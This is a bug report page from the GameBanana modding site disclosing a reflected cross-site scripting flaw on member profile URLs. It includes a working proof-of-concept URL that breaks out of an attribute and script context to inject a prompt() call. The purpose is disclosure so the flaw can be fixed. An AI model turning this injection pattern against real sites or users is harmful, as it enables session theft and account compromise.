Ads keep us online. Without them, we wouldn't exist. We don't have paywalls or sell mods - we never will. But every month we have large bills and running ads is our only way to cover them. Please consider unblocking us. Thank you from GameBanana <3

Reflected XSS on any members URL

A Bug

Details
Reflected XSS is possible on any members URL.
Appending any input variable to the URL such as blablabla won't get encoded.

https://gamebanana.com/members/1547916?blablabla=">"`;prompt("xss on it\'s way.\n\n- theNurky")</script><script>`<x x="

Comments

Sign up to access this!

No comments yet

Embed

menu
Share banner
Image URL
HTML embed code
BB embed code
Markdown embed code

Reporter

theNurky avatar
theNurky Joined 3y ago
I am offline
1,060 points Ranked 24190th
18 medals 2 rare
  • Submitted 20 Maps Medal icon
  • Returned 1000 times Medal icon
  • Submitted 5 Maps Medal icon
  • Returned 100 times Medal icon
  • One month a member Medal icon
  • Submitted 1 Tool Medal icon
theNurky
Sign up to access this!
Sign up to access this!
Sign up to access this!

Details

Resolution
New
Priority
Low
Problem Source
http://www.gamebanana.com

Share

  • Share on Reddit
  • Share on Twitter
  • Share on Facebook
  • access_time 6mo
  • access_time 6mo

More from Submitter

menu